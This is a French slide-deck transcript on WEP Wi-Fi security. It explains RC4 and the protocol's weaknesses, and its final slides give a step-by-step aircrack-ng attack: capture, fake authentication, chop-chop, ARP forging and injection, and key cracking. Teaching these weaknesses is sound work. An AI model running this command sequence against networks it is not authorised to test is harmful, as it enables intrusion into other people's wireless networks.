haking wep

22
Clé WEP AFIFI FAISSAL

description

hacking wep : failles , vulnérabilités et menaces de la clé wep.

Transcript of haking wep

Page 1: haking wep

Clé WEP

AFIFI FAISSAL

Page 2: haking wep

• Type de réseau – LAN (Local Area Network)– MAN (Metropolitan Area network)– WAN (Wide Area Network)

• Qu’est ce qu’un réseau Wi-Fi? – Ondes radioélectriques– Standards 802.11

Page 3: haking wep

TCP/IP

Page 4: haking wep

WEP(Wired Equivalent Privacy)

• Qu’est ce que le WEP?– Fait partie de la norme internationale IEEE 802.11– Une solution de confidentialité équivalente à un réseau

filaire– Employé dans un WLAN pour :

» La confidentialité» L’authentification » L’intégrité

Page 5: haking wep

WEP(Wired Equivalent Privacy)

• Il est défini comme :– assez for: pour les clés longue (brute force) – à synchronisation automatique: les paquets sont autonomes– efficace : rapides (chiffrement et déchiffrement) – normalement exportable : longueur de clé variable– optionnel : l’utilisation du WEP est optionnel

Page 6: haking wep

Le chiffrement WEP

• Il repose sur l’algorithme à clé symétrique RC4• Le chiffrement se décompose en plusieurs

phases : – La création de la graine :IV+clé– La création du keystream – Le calcul ICV « Integrity Check Value »– La constitution du message final et son encapsulation dans

une trame

Page 7: haking wep

L’algorithme RC4 dans WEP

RC4– Symétrique– Chiffrement par flux– Différentes tailles de clé jusqu’à 256 bit– Il est extrêmement rapide

Fonctionement • On génère un flux de données de taille identique au

flux de données claires et on fait un XOR entre les deux

Page 8: haking wep

Initialisation de la clé

• Deux longueurs de clé WEP– Clé (40 bits, soit 5 octets ) + IV = 64 bits – Clé (104 bits, soit 13 octets) + IV = 128 bits

GraineIV : vecteur d’initialisation est une séquence de bits qui change régulièrement

Page 9: haking wep

Table «S» initialisée

Mélange du tableau KSApour i de 0 à 255 faire T[i]=i fin pour y ← 0 pour x de 0 à 255 faire y ← y + T[x] + S[x] (modulo 256) T[x] ↔ T[y] fin pour

Page 10: haking wep

Pseudo Random Generator Algorithm PRGA

Obtention du keystream =>

PRGA(T) :x ← 0 y ← 0 x ← x+1 y ← y+T[x] T[x] ↔ T[y] z ← T[x] + T[y] (modulo 256) renvoie T[z]

Page 11: haking wep
Page 12: haking wep

Opérations de chiffrement et de déchiffrement

Page 13: haking wep

LES FAILLES DU WEP

• Social-Engineering

• cryptanalyse

Page 14: haking wep

Les principales failles du WEP sont essentiellement les suivantes :

• Les algorithmes de vérification d’intégrité et d’authentification sont très facilement contournables.

• Possibilité de construire des dictionnaires fournissant en fonction d’un IV, le keystream.

• L’algorithme de chiffrement RC4 présente des clés faibles et l’espace disponible pour les IV est trop petit.

• • Une même clé est utilisée pour tout le réseau et les clés de chiffrement sont

statiques .

• Clés courtes 40 bits (5 caractères !!!) ou 104 bits et/ou trop simples (attaque par dictionnaire)

Page 15: haking wep

Les faiblesses du IV

IV moins de 17 millions de combinaisons

forte possibilité de Collisions

Sniffer le réseau : ETHEREAL, WIRESHARK (la carte Wi-Fi en mode monitor)

Page 16: haking wep

Attaques contre le WEP

L’attaque chop-chop • Le WEP utilise un contrôle de redondance cyclique ICV• Le CRC permet de s’assurer de l’intégrité des données mais en

aucun cas de leur sécurité• L’attaque chop-chop va donc utiliser cette faiblesse pour

injecter des paquets sur le réseau.

Page 17: haking wep

Trame1 Trame 2

ajout 1 octet de données

Il est possible de passer du paquet 2 au paquet 1 en devinant la valeur de la somme I3+D5 (1 chance sur 256). On note X = I3 + D5.

_____ DATA ___ ___ICV ___D0 D1 D2 D3 D4 I3 I2 I1 I0+ + + + + + + + +K0 K1 K2 K3 K4 K5 K6 K7 K8= = = = = = = = =R0 R1 R2 R3 R4 R5 R6 R7 R8

_____ DATA ____ ___ICV ___D0 D1 D2 D3 D4 D5 J3 J2 J1 J0+ + + + + + + + + +K0 K1 K2 K3 K4 K5 K6 K7 K8 K9= = = = = = = = = =S0 S1 S2 S3 S4 S5 S6 S7 S8 S9

Page 18: haking wep

Suite L’attaque chop-chop

scan des réseaux wifiairodump-ng -w out -c 10 --encrypt wep --bssid

00:16:41:C9:E0:3F wlan0

on se fait passer pour un client: fake authentification

aireplay-ng wlan0 -1 30 -e nom_wifi -a 00:16:41:C9:E0:3F -h 00:12:F0:6F:ED:38

Page 19: haking wep

L'attaque Chopchopaireplay-ng -4 wlan0 -a 00:16:41:C9:E0:3F -h

00:12:F0:6F:ED:38 => resultat : 2 fichiers .cap et .xor

Forger un paquet ARP avec Packetforge-ngpacketforge-ng -0 -a 00:16:41:C9:E0:3F -h

00:12:F0:6F:ED:38 -k 192.168.1.1 -l 192.168.1.10 -y .xor -w arp.cap

Page 20: haking wep

L'injection: Aireplay-ng -3, arp replay#aireplay-ng -3 -e nom_wifi -a 00:16:41:C9:E0:3F -h

00:12:F0:6F:ED:38 -x600 -r arp.cap wlan0

Le crack de la clé wep avec Aircrack-ng#aircrack-ng out-01.cap

Page 21: haking wep

Attaques contre RC4

Page 22: haking wep

Implementation